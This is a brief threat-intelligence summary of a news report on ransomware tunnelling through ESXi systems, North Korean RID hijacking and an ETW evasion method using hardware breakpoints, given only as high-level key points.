Summary: Cybersecurity researchers have uncovered ransomware attacks exploiting ESXi systems to create stealthy tunnels to command-and-control infrastructure, increasing persistence in corporate networks. Additionally, a North Korean group is employing RID hijacking to covertly elevate privileges, allowing undetected malicious activity. Lastly, a new technique to evade detection using hardware breakpoints highlights ongoing challenges in cybersecurity defense mechanisms.
Affected: ESXi systems, corporate networks, Windows systems
Keypoints :
- Ransomware targets ESXi systems to tunnel traffic to C2 infrastructure using SSH and other tools.
- Threat actors exploit admin credentials or vulnerabilities to compromise ESXi appliances, creating persistent backdoors.
- The North Korean Andariel group utilizes RID hijacking to gain administrator privileges while remaining undetected.
- A new evasion technique leverages hardware breakpoints to bypass Event Tracing for Windows (ETW) detections.
Source: https://thehackernews.com/2025/01/ransomware-targets-esxi-systems-via.html